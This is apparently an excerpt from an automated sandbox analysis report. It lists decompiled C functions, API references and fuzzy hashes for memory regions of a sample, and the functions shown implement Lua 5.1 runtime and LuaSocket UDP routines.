Opcode ID: 85203043e23ea4af22682c07e0629eb098b14e83456a4e37432e123359971f32
Instruction ID: 64766acc6bdc570def73a0a9db92731f8908710771f149e31b43a89c971b5f83
Opcode Fuzzy Hash: 85203043e23ea4af22682c07e0629eb098b14e83456a4e37432e123359971f32
Instruction Fuzzy Hash: 5131C772D0C3405BC310EB199C42F6BB7E8BBD9304F584A2DFAC553202EA38D6058797

Uniqueness

Uniqueness Score: -1.00%

Function 009922A0, Relevance: 19.6, APIs: 13, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E009922A0(intOrPtr __eax, long long __fp0) {
				intOrPtr _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr* _t39;
				intOrPtr _t42;
				void* _t45;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				long long* _t58;
				void* _t59;
				long long* _t61;
				long long _t69;

				_t69 = __fp0;
				_t54 =  *((intOrPtr*)(_t56 + 0x20));
				_push(_t54);
				L00994B60();
				 *((intOrPtr*)(_t56 + 0x20)) = __eax;
				_t32 = _t56 + 0x14;
				_push(_t32);
				_push(2);
				_push(_t54);
				 *((intOrPtr*)(_t56 + 0x20)) = 0;
				 *((intOrPtr*)(_t56 + 0x34)) = 0;
				L00994B54();
				_push(0x3ff00000);
				_push(0);
				_push(3);
				_push(_t54);
				 *((intOrPtr*)(_t56 + 0x34)) = _t32;
				L00994B72();
				L00994BD0();
				_push(0xbff00000);
				_push(0);
				_push(4);
				_push(_t54);
				_t53 = _t32;
				L00994B72();
				L00994BD0();
				_t55 =  *((intOrPtr*)(_t56 + 0x58));
				_t42 = _t32;
				E00992DC0(__fp0,  *((intOrPtr*)(_t55 + 0x14)));
				_t34 =  *((intOrPtr*)(_t56 + 0x44));
				_t57 = _t56 + 0x34;
				if(_t53 < 0) {
					_t53 = _t53 + _t34 + 1;
				}
				if(_t42 < 0) {
					_t42 = _t42 + _t34 + 1;
				}
				if(_t53 < 1) {
					_t53 = 1;
				}
				if(_t42 > _t34) {
					_t42 = _t34;
				}
				if(_t53 > _t42) {
					L11:
					_t50 =  *((intOrPtr*)(_t57 + 0x24));
					 *((intOrPtr*)(_t57 + 0x18)) = 0;
					_t58 = _t57 - 8;
					_t28 = _t50 - 1; // -1
					_t35 = _t53 + _t28;
					 *((intOrPtr*)(_t58 + 0x1c)) = _t35;
					asm("fild qword [esp+0x1c]");
					 *_t58 = _t69;
					_push(_t54);
					L00994B5A();
					_push(_t54);
					L00994B4E();
					_push(_t54);
					L00994B4E();
					_t59 = _t58 + 0x14;
				} else {
					_t17 =  *((intOrPtr*)(_t57 + 0x14)) - 1; // -1
					_t45 = E00992550(_t55, _t53 + _t17, _t42 - _t53 + 1, _t57 + 0x24);
					_t57 = _t57 + 0x10;
					if(_t45 == 0) {
						goto L11;
					} else {
						L00994B4E();
						_t39 =  *((intOrPtr*)(_t55 + 0x10));
						_push( *((intOrPtr*)(_t39 + 0xc))( *_t39, _t45, _t54));
						_push(_t54);
						L00994AD0();
						_t35 =  *((intOrPtr*)(_t57 + 0x38));
						 *((intOrPtr*)(_t57 + 0x2c)) = 0;
						_t61 = _t57 + 0xc;
						_t23 = _t35 - 1; // -1
						 *((intOrPtr*)(_t61 + 0x1c)) = _t53 + _t23;
						asm("fild qword [esp+0x1c]");
						 *_t61 = _t69;
						_push(_t54);
						L00994B5A();
						_t59 = _t61 + 0xc;
					}
				}
				_push(_t54);
				L00994B60();
				return _t35 -  *((intOrPtr*)(_t59 + 0x20));
			}

0x009922a0
0x009922a6
0x009922ab
0x009922ac
0x009922b1
0x009922b5
0x009922b9
0x009922bc
0x009922be
0x009922bf
0x009922c3
0x009922c7
0x009922cc
0x009922d1
0x009922d2
0x009922d4
0x009922d5
0x009922d9
0x009922de
0x009922e3
0x009922e8
0x009922e9
0x009922eb
0x009922ec
0x009922ee
0x009922f3
0x009922f8
0x009922fc
0x00992302
0x00992307
0x0099230b
0x00992310
0x00992312
0x00992312
0x00992318
0x0099231a
0x0099231a
0x00992321
0x00992323
0x00992323
0x0099232a
0x0099232c
0x0099232c
0x00992330
0x00992393
0x00992393
0x00992397
0x0099239f
0x009923a2
0x009923a2
0x009923a6
0x009923aa
0x009923ae
0x009923b1
0x009923b2
0x009923b7
0x009923b8
0x009923bd
0x009923be
0x009923c3
0x00992332
0x0099233e
0x0099234a
0x0099234c
0x00992351
0x00000000
0x00992353
0x00992354
0x00992359
0x00992363
0x00992364
0x00992365
0x0099236a
0x0099236e
0x00992376
0x00992379
0x0099237d
0x00992381
0x00992385
0x00992388
0x00992389
0x0099238e
0x0099238e
0x00992351
0x009923c6
0x009923c7
0x009923dc

APIs

lua_gettop.LUA5.1(?,?,?), ref: 009922AC
luaL_checklstring.LUA5.1(?,00000002,?,?,?,?), ref: 009922C7
luaL_optnumber.LUA5.1(?,00000003,00000000,3FF00000,?,00000002,?,?,?,?), ref: 009922D9
_ftol.MSVCRT ref: 009922DE
luaL_optnumber.LUA5.1(?,00000004,00000000,BFF00000,?,00000003,00000000,3FF00000,?,00000002,?,?,?,?), ref: 009922EE
_ftol.MSVCRT ref: 009922F3
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00992354
lua_pushstring.LUA5.1(?,00000000,?,00000000,?), ref: 00992365
lua_pushnumber.LUA5.1(?,?,00000000,?), ref: 00992389
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009923B2
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009923B8
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009923BE
lua_gettop.LUA5.1(?), ref: 009923C7

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnil.$L_optnumber._ftollua_gettop.lua_pushnumber.$L_checklstring.lua_pushstring.
String ID:
API String ID: 940254564-0
Opcode ID: 2d4820dc67d31940283d6f29c7d3c88c5dc5fd05e285598b2f215a9ae9094012
Instruction ID: 44c93f1b2c7af469c5619998a2c070a590a6b8ab46b1a077b5bacd2b8ca624cd
Opcode Fuzzy Hash: 2d4820dc67d31940283d6f29c7d3c88c5dc5fd05e285598b2f215a9ae9094012
Instruction Fuzzy Hash: 643170B15057056BD701EF6C9886F5FB3E8EFC9704F400928F94493206DB79DA168BA6

Uniqueness

Uniqueness Score: -1.00%

Function 1000F900, Relevance: 19.6, APIs: 13, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000F900(signed int __ecx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void* _t11;
				void* _t12;
				intOrPtr _t20;
				char* _t25;
				signed int _t26;
				char* _t29;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				char* _t44;
				void* _t48;

				_t48 = __fp0;
				_t26 = __ecx;
				_t32 = _a4;
				E100013D0(__eflags, _a4, _a8);
				_t25 = _a12;
				_t36 = _t35 + 8;
				while(1) {
					_t29 = strchr(_t25, 0x2e);
					_t37 = _t36 + 8;
					if(_t29 == 0) {
						asm("repne scasb");
						_t26 =  !(_t26 | 0xffffffff) - 1;
						_t29 =  &(_t25[_t26]);
						_t44 = _t29;
					}
					_t34 = _t29 - _t25;
					E10001930(_t32, _t25, _t29 - _t25);
					E10001BF0(_t44, _t48, _t32, 0xfffffffe);
					_t11 = E10001410(_t44, _t32, 0xffffffff);
					_t38 = _t37 + 0x1c;
					if(_t11 != 0) {
						goto L7;
					}
					E10001160(_t32, 0xfffffffe);
					_t41 = _t38 + 8;
					_t46 =  *_t29 - 0x2e;
					_t20 = 1;
					if( *_t29 != 0x2e) {
						_t20 = _a16;
					}
					E10001C70(_t32, 0, _t20);
					E10001930(_t32, _t25, _t34);
					E100013D0(_t46, _t32, 0xfffffffe);
					E10001DA0(_t46, _t32, 0xfffffffc);
					_t39 = _t41 + 0x28;
					L8:
					E100011B0(_t46, _t32, 0xfffffffe);
					_t36 = _t39 + 8;
					_t5 =  &(_t29[1]); // 0x1
					_t25 = _t5;
					if( *_t29 != 0x2e) {
						__eflags = 0;
						return 0;
					} else {
						continue;
					}
					L12:
					L7:
					_t12 = E10001410(__eflags, _t32, 0xffffffff);
					_t39 = _t38 + 8;
					__eflags = _t12 - 5;
					if(__eflags != 0) {
						E10001160(_t32, 0xfffffffd);
						return _t25;
					} else {
						goto L8;
					}
					goto L12;
				}
			}

0x1000f900
0x1000f900
0x1000f907
0x1000f90e
0x1000f913
0x1000f917
0x1000f91a
0x1000f923
0x1000f925
0x1000f92a
0x1000f931
0x1000f935
0x1000f938
0x1000f938
0x1000f938
0x1000f93c
0x1000f941
0x1000f949
0x1000f951
0x1000f956
0x1000f95b
0x00000000
0x00000000
0x1000f960
0x1000f967
0x1000f96a
0x1000f96c
0x1000f971
0x1000f973
0x1000f973
0x1000f97b
0x1000f983
0x1000f98b
0x1000f993
0x1000f998
0x1000f9ad
0x1000f9b0
0x1000f9b7
0x1000f9bc
0x1000f9bc
0x1000f9bf
0x1000f9db
0x1000f9de
0x1000f9c1
0x00000000
0x1000f9c1
0x00000000
0x1000f99d
0x1000f9a0
0x1000f9a5
0x1000f9a8
0x1000f9ab
0x1000f9c9
0x1000f9d7
0x00000000
0x00000000
0x00000000
0x00000000
0x1000f9ab

APIs

lua_pushvalue.LUA5.1(?,?,?,?,?,?,1000F747,?,FFFFD8F0,_LOADED,00000000,?), ref: 1000F90E
strchr.MSVCRT ref: 1000F91D
lua_pushlstring.LUA5.1(?,?,00000000), ref: 1000F941
lua_rawget.LUA5.1(?,000000FE,?,?,00000000), ref: 1000F949
lua_type.LUA5.1(?,000000FF,?,000000FE,?,?,00000000), ref: 1000F951
lua_settop.LUA5.1(?,000000FE), ref: 1000F960
lua_createtable.LUA5.1(?,00000000,00000001), ref: 1000F97B
lua_pushlstring.LUA5.1(?,00000001,?,?,00000000,00000001), ref: 1000F983
lua_pushvalue.LUA5.1(?,000000FE,?,00000001,?,?,00000000,00000001), ref: 1000F98B
lua_settable.LUA5.1(?,000000FC,?,000000FE,?,00000001,?,?,00000000,00000001), ref: 1000F993
lua_type.LUA5.1(?,000000FF), ref: 1000F9A0
lua_remove.LUA5.1(?,000000FE), ref: 1000F9B0
lua_settop.LUA5.1(?,000000FD), ref: 1000F9C9

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushlstring.lua_pushvalue.lua_settop.lua_type.$lua_createtable.lua_rawget.lua_remove.lua_settable.strchr
String ID:
API String ID: 2793699161-0
Opcode ID: ca87a098548f77ab3e28718243eb2970d6f465ebd00a41d7a3691c4bb880d2cb
Instruction ID: ff9758cb5eb732790a63958aeb2baf89b6633ee2b3bb0b040b9b90e941eecdf1
Opcode Fuzzy Hash: ca87a098548f77ab3e28718243eb2970d6f465ebd00a41d7a3691c4bb880d2cb
Instruction Fuzzy Hash: 5621383940D22633F101D6286C81EEF324DCF471F5F240329F574626DAEF05AA4212F6

Uniqueness

Uniqueness Score: -1.00%

Function 10014960, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 175
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10014960(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char* _v284;
				char _v288;
				void* __ebp;
				void* _t35;
				intOrPtr _t36;
				intOrPtr _t45;
				void* _t46;
				void* _t51;
				void* _t53;
				char* _t58;
				intOrPtr _t59;
				char* _t72;
				void* _t73;
				intOrPtr _t78;
				intOrPtr _t79;
				char _t85;
				void* _t89;
				void* _t90;
				void* _t94;

				_t103 = __fp0;
				_t59 = _a4;
				_t85 = E1000F4A0(__eflags, _t59, 1,  &_v288);
				_t72 = E1000F4A0(__eflags, _t59, 2,  &_v280);
				_v284 = _t72;
				_t35 = E100144C0(E1000F600(__eflags, __fp0, _t59, 3, 1), _v288);
				_t36 = _v288;
				_t89 =  &_v288 + 0x2c;
				_t78 = _t35 - 1;
				if(_t78 >= 0) {
					__eflags = _t78 - _t36;
					if(__eflags > 0) {
						_t78 = _t36;
					}
				} else {
					_t78 = 0;
				}
				_t98 = _a8;
				if(_a8 == 0) {
					L10:
					__eflags =  *_t72 - 0x5e;
					if( *_t72 != 0x5e) {
						_v276 = 0;
					} else {
						_v276 = 1;
						_v284 =  &(_t72[1]);
					}
					_t73 = _t78 + _t85;
					_push(_v284);
					_push(_t73);
					_push( &_v272);
					_v264 = _t59;
					_v272 = _t85;
					_v268 = _t36 + _t85;
					_v260 = 0;
					_t79 = E10014B40();
					_t90 = _t89 + 0xc;
					__eflags = _t79;
					if(_t79 != 0) {
						L17:
						__eflags = _a8;
						if(_a8 == 0) {
							return E100154F0(_t85, _t103,  &_v272, _t73, _t79);
						} else {
							_push(_t73 - _t85 + 1);
							E10001910(_t103, _t59);
							_push(_t79 - _t85);
							E10001910(_t103, _t59);
							_t45 = E100154F0(_t85, _t103,  &_v272, 0, 0) + 2;
							__eflags = _t45;
							return _t45;
						}
					} else {
						while(1) {
							_t46 = _t73;
							_t73 = _t73 + 1;
							__eflags = _t46 - _v268;
							if(_t46 >= _v268) {
								goto L20;
							}
							__eflags = _v276;
							if(_v276 != 0) {
								goto L20;
							} else {
								_push(_v284);
								_push(_t73);
								_push( &_v272);
								_v260 = 0;
								_t79 = E10014B40();
								_t90 = _t90 + 0xc;
								__eflags = _t79;
								if(_t79 == 0) {
									continue;
								} else {
									goto L17;
								}
							}
							goto L21;
						}
						goto L20;
					}
				} else {
					_t51 = E100016C0(_t98, _t59, 4);
					_t94 = _t89 + 8;
					if(_t51 != 0) {
						L7:
						_t53 = E10015480(_t78 + _t85, _v288 - _t78, _t72, _v280);
						_t90 = _t94 + 0x10;
						if(_t53 == 0) {
							L20:
							E100018C0(_t59);
							return 1;
						} else {
							_t10 = _t53 - _t85 + 1; // 0x1
							E10001910(_t103, _t59);
							_push(_t53 - _t85 + _v280);
							E10001910(_t103, _t59);
							return 2;
						}
					} else {
						_t58 = strpbrk(_t72, "^$*+?.([%-");
						_t89 = _t94 + 8;
						if(_t58 != 0) {
							_t36 = _v288;
							goto L10;
						} else {
							goto L7;
						}
					}
				}
				L21:
			}

0x10014960
0x10014967
0x10014982
0x10014994
0x1001499c
0x100149a9
0x100149b0
0x100149b4
0x100149b7
0x100149b8
0x100149be
0x100149c0
0x100149c2
0x100149c2
0x100149ba
0x100149ba
0x100149ba
0x100149cb
0x100149cd
0x10014a43
0x10014a43
0x10014a46
0x10014a57
0x10014a48
0x10014a49
0x10014a51
0x10014a51
0x10014a63
0x10014a66
0x10014a6d
0x10014a6e
0x10014a6f
0x10014a73
0x10014a77
0x10014a7b
0x10014a88
0x10014a8a
0x10014a8d
0x10014a8f
0x10014ac9
0x10014ad0
0x10014ad2
0x10014b1f
0x10014ad4
0x10014ad7
0x10014ad9
0x10014ae0
0x10014ae2
0x10014af8
0x10014af8
0x10014b05
0x10014b05
0x10014a91
0x10014a91
0x10014a95
0x10014a97
0x10014a98
0x10014a9a
0x00000000
0x00000000
0x10014aa4
0x10014aa6
0x00000000
0x10014aa8
0x10014ab0
0x10014ab1
0x10014ab2
0x10014ab3
0x10014ac0
0x10014ac2
0x10014ac5
0x10014ac7
0x00000000
0x00000000
0x00000000
0x00000000
0x10014ac7
0x00000000
0x10014aa6
0x00000000
0x10014a91
0x100149cf
0x100149d2
0x100149d7
0x100149dc
0x100149f1
0x10014a01
0x10014a06
0x10014a0b
0x10014b20
0x10014b21
0x10014b38
0x10014a11
0x10014a15
0x10014a1a
0x10014a25
0x10014a27
0x10014a3e
0x10014a3e
0x100149de
0x100149e4
0x100149ea
0x100149ef
0x10014a3f
0x00000000
0x00000000
0x00000000
0x00000000
0x100149ef
0x100149dc
0x00000000

APIs

luaL_checklstring.LUA5.1(?,00000001,?), ref: 10014979

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_checklstring.LUA5.1(?,00000002,?,?,00000001,?), ref: 10014988
luaL_optinteger.LUA5.1(?,00000003,00000001,?), ref: 100149A0

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

lua_toboolean.LUA5.1(?,00000004,?,?,?,?,?), ref: 100149D2
strpbrk.MSVCRT ref: 100149E4
lua_pushinteger.LUA5.1(?,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 10014A1A
lua_pushinteger.LUA5.1(?,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 10014A27
lua_pushinteger.LUA5.1(?,00000001,?,?,?,?,?,?,?,?), ref: 10014AD9
lua_pushinteger.LUA5.1(?,00000000,?,00000001,?,?,?,?,?,?,?,?), ref: 10014AE2

Part of subcall function 100154F0: luaL_checkstack.LUA5.1(?,?,too many captures,00000000,00000000,?,10014B12,?,00000000,00000000), ref: 10015515

Strings

^$*+?.([%-, xrefs: 100149DE

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushinteger.$L_checklstring.$L_checkstack.L_optinteger.lua_toboolean.lua_tolstring.lua_type.strpbrk
String ID: ^$*+?.([%-
API String ID: 3281591736-500756693
Opcode ID: a0c812634ec764d491a5025f904d3076fbc8bc0b1cfe9e26ba16b01a39ab6f0b
Instruction ID: 21bc6435e6f9d999802350bad03b552561c5bc5c840d3a4c47cb4ab148b30f28
Opcode Fuzzy Hash: a0c812634ec764d491a5025f904d3076fbc8bc0b1cfe9e26ba16b01a39ab6f0b
Instruction Fuzzy Hash: 0A511DB660430167D310DB25DC81FABB7D8DFC4799F46091CFD499B242EA36ED8487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00993930, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100
networkCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00993930(void* __eflags, long long __fp0, intOrPtr _a4) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				short _v16;
				short _v18;
				char _v20;
				intOrPtr _v24;
				char _v28;
				short _v32;
				char* _t23;
				void* _t24;
				short _t25;
				void* _t28;
				void* _t32;
				void* _t39;
				intOrPtr _t41;
				void* _t44;
				void* _t45;
				long long _t52;

				_t52 = __fp0;
				_t41 = _a4;
				_t39 = E00991200(_t41, "udp{unconnected}", 1);
				_t23 =  &_v28;
				_push(_t23);
				_push(2);
				_push(_t41);
				_a4 = 0;
				L00994B54();
				_push(0);
				_push(3);
				_push(_t41);
				_v24 = _t23;
				L00994B54();
				_push(4);
				_push(_t41);
				L00994B66();
				L00994BD0();
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v32 = _t23;
				_t10 = _t39 + 8; // 0x8
				_t32 = _t10;
				_v4 = 0;
				_t24 = E00991980(_t23,  &_v12);
				_t44 =  &_v32 + 0x34;
				if(_t24 == 0) {
					_push("invalid ip address");
					_push(3);
					_push(_t41);
					L00994B2A();
					_t44 = _t44 + 0xc;
				}
				_t25 = _v32;
				_v16 = 2;
				_push(_t25);
				L00994A2E();
				_v18 = _t25;
				E00992DC0(_t52, _t32);
				_push(_t32);
				_t28 = E00994490(_t39, _v28, _v32,  &_v0,  &_v20, 0x10);
				_t40 = _t28;
				_t45 = _t44 + 0x20;
				if(_t28 == 0) {
					_v24 = 0;
					_v28 = _v0;
					asm("fild qword [esp+0x20]");
					 *((long long*)(_t45 - 8)) = _t52;
					_push(_t41);
					L00994B5A();
					return 1;
				} else {
					_push(_t41);
					L00994B4E();
					_push(E00993860(_t40));
					_push(_t41);
					L00994AD0();
					return 2;
				}
			}

0x00993930
0x00993936
0x00993948
0x0099394a
0x0099394e
0x0099394f
0x00993951
0x00993952
0x0099395a
0x0099395f
0x00993961
0x00993963
0x00993964
0x00993968
0x0099396d
0x0099396f
0x00993972
0x00993977
0x00993982
0x00993987
0x0099398c
0x00993990
0x00993994
0x00993994
0x00993997
0x0099399b
0x009939a0
0x009939a5
0x009939a7
0x009939ac
0x009939ae
0x009939af
0x009939b4
0x009939b4
0x009939b7
0x009939bb
0x009939c2
0x009939c3
0x009939c9
0x009939ce
0x009939d7
0x009939eb
0x009939f0
0x009939f2
0x009939f7
0x00993a20
0x00993a28
0x00993a2f
0x00993a33
0x00993a36
0x00993a37
0x00993a4b
0x009939f9
0x009939f9
0x009939fa
0x00993a05
0x00993a06
0x00993a07
0x00993a1b
0x00993a1b

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

luaL_checklstring.LUA5.1 ref: 0099395A
luaL_checklstring.LUA5.1(?,00000003,00000000), ref: 00993968
luaL_checknumber.LUA5.1(?,00000004,?,00000003,00000000), ref: 00993972
_ftol.MSVCRT ref: 00993977

Part of subcall function 00991980: sscanf.MSVCRT ref: 009919BF
Part of subcall function 00991980: htonl.WSOCK32(?), ref: 00991A20

luaL_argerror.LUA5.1(?,00000003,invalid ip address,?,?,?,?,00000002,?,?,udp{unconnected},00000001), ref: 009939AF
htons.WSOCK32(?), ref: 009939C3
lua_pushnil.LUA5.1(?), ref: 009939FA
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 00993A07
lua_pushnumber.LUA5.1(?), ref: 00993A37

Strings

invalid ip address, xrefs: 009939A7
udp{unconnected}, xrefs: 0099393D

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.$L_checknumber._ftolhtonlhtonslua_pushnil.lua_pushnumber.lua_pushstring.sprintfsscanf
String ID: invalid ip address$udp{unconnected}
API String ID: 312750451-2431006874
Opcode ID: 6bcecefcb3fda2d8381a76abffd95dd60013eeb0c97408b9a8b306e19c709379
Instruction ID: 3e48655cf60cf66c3a13763c78c92a0cd625e635461c9924c8a5fbc1b8326e61
Opcode Fuzzy Hash: 6bcecefcb3fda2d8381a76abffd95dd60013eeb0c97408b9a8b306e19c709379
Instruction Fuzzy Hash: 6431D4715093006BEB11AB99DC42FAFB7ECEFC9314F00491DF59493241E6B5D60987A7

Uniqueness

Uniqueness Score: -1.00%

Function 10011AE0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011AE0(void* __eflags, void* __fp0, char _a4) {
				char _v8;
				void* _t7;
				void* _t19;
				void* _t30;

				_t30 = __fp0;
				_t21 = _a4;
				_t22 = E10011630(__eflags, _a4,  &_a4);
				_t19 = E10003F20(_t5);
				_t7 = E10003F10(_t5);
				if(_t7 == 0 || _t7 == E100119A0) {
					E10011A80(__eflags, _t30, _t22);
					E10001B10(_t22, _t22);
					E10001BF0(__eflags, _t30, _t22, 0xfffffffe);
					E100011B0(__eflags, _t22, 0xfffffffe);
					E10001090(_t22, _t21, 1);
				} else {
					E10001930(_t21, "external hook", 0xd);
				}
				E10001980( &_v8, _t21, E10011B80(_t19,  &_v8));
				_push(E10003F30(_t22));
				E10001910(_t30, _t21);
				return 3;
			}

0x10011ae0
0x10011aea
0x10011af5
0x10011afe
0x10011b00
0x10011b0a
0x10011b26
0x10011b2d
0x10011b35
0x10011b3d
0x10011b46
0x10011b13
0x10011b1b
0x10011b20
0x10011b5b
0x10011b66
0x10011b68
0x10011b7b

APIs

Part of subcall function 10011630: lua_type.LUA5.1(?,00000001,?,100113D5,?,?), ref: 10011638
Part of subcall function 10011630: lua_tothread.LUA5.1(?,00000001), ref: 10011652

lua_gethookmask.LUA5.1(00000000,?,?), ref: 10011AF8
lua_gethook.LUA5.1(00000000,00000000,?,?), ref: 10011B00
lua_pushlstring.LUA5.1(?,external hook,0000000D), ref: 10011B1B

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

lua_pushlightuserdata.LUA5.1(00000000,00000000,00000000), ref: 10011B2D
lua_rawget.LUA5.1(00000000,000000FE,00000000,00000000,00000000), ref: 10011B35
lua_remove.LUA5.1(00000000,000000FE,00000000,000000FE,00000000,00000000,00000000), ref: 10011B3D
lua_xmove.LUA5.1(00000000,?,00000001,00000000,000000FE,00000000,000000FE,00000000,00000000,00000000), ref: 10011B46
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 10011B5B
lua_gethookcount.LUA5.1(00000000,?,00000000,00000000,?), ref: 10011B61
lua_pushinteger.LUA5.1(?,00000000,00000000,?,00000000,00000000,?), ref: 10011B68

Strings

external hook, xrefs: 10011B15

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.lua_gethook.lua_gethookcount.lua_gethookmask.lua_pushinteger.lua_pushlightuserdata.lua_pushlstring.lua_pushstring.lua_rawget.lua_remove.lua_tothread.lua_type.lua_xmove.
String ID: external hook
API String ID: 400439763-1254446183
Opcode ID: 38531f6e130dbe318ddbee2d5ddfa381a3318f6ed90d10aaa7bc1c0059d8c342
Instruction ID: 5c0bae743753f6d86f9b89ff55615ff17acc6a8fc6b5d52461df47b8d6adb203
Opcode Fuzzy Hash: 38531f6e130dbe318ddbee2d5ddfa381a3318f6ed90d10aaa7bc1c0059d8c342
Instruction Fuzzy Hash: 1201A27990902135E106E2241C93EFF226CCF864E0F440625F915A908BFF39F68A41FB

Uniqueness

Uniqueness Score: -1.00%

Function 10010530, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10010530(void* __ebx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t6;
				void* _t7;
				void* _t10;
				signed char _t11;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t24 = __eflags;
				_t18 = _a4;
				E1000F410(__ebx, __eflags, _t18, 2, 5);
				E10010470(__ebx, _t17, __eflags, __fp0, _t18, 0);
				E100013D0(__eflags, _t18, 2);
				_t6 = E10001490(_t24, __fp0, _t18, 1);
				_t20 = _t19 + 0x24;
				_t25 = _t6;
				if(_t6 == 0) {
					L3:
					_t7 = E10001460(__eflags, _t18, 0xfffffffe);
					_t21 = _t20 + 8;
					__eflags = _t7;
					if(__eflags != 0) {
						L5:
						_push("\'setfenv\' cannot change environment of given object");
						_push(_t18);
						E1000F230();
					} else {
						_t10 = E10001FE0(__eflags, _t18, 0xfffffffe);
						_t21 = _t21 + 8;
						__eflags = _t10;
						if(_t10 == 0) {
							goto L5;
						}
					}
					return 1;
				} else {
					_t11 = E10001630(_t25, __fp0, _t18, 1);
					asm("fcomp qword [0x100171e8]");
					_t20 = _t20 + 8;
					asm("fnstsw ax");
					_t26 = _t11 & 0x00000040;
					if((_t11 & 0x00000040) == 0) {
						goto L3;
					} else {
						E10001B30(_t18);
						E100012B0(_t26, _t18, 0xfffffffe);
						E10001FE0(_t26, _t18, 0xfffffffe);
						return 0;
					}
				}
			}

0x10010530
0x10010531
0x1001053a
0x10010542
0x1001054a
0x10010552
0x10010557
0x1001055a
0x1001055c
0x10010593
0x10010596
0x1001059b
0x1001059e
0x100105a0
0x100105b1
0x100105b1
0x100105b6
0x100105b7
0x100105a2
0x100105a5
0x100105aa
0x100105ad
0x100105af
0x00000000
0x00000000
0x100105af
0x100105c5
0x1001055e
0x10010561
0x10010566
0x1001056c
0x1001056f
0x10010571
0x10010574
0x00000000
0x10010576
0x10010577
0x1001057f
0x10010587
0x10010592
0x10010592
